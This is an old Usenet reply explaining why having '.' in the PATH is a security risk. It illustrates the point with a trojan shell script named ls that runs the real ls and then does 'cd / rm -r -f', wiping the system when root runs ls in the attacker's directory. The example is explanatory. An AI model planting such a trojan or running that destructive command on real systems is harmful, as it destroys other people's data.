> > There shouldn't be a "." in your PATH; even at the end, it's a > > security risk. > > Why ? How it can be exploited ?
Simple - I put a program called ls in my home directory of a machine I want to wreck. #!/bin/bash /usr/bin/ls cd / rm -r -f and make it executable. Root cds to my directory to check up on something, and does an ls. Voila - one hosed system, and chances are he won't notice until at least some damage is done. Matthew -- Elen sila lumenn' omentielvo Steward of the Cambridge Tolkien Society Selwyn College Computer Support http://www.geocities.com/Area51/Chamber/8841/ http://www.cam.ac.uk/CambUniv/Societies/tolkien/ http://pick.sel.cam.ac.uk/
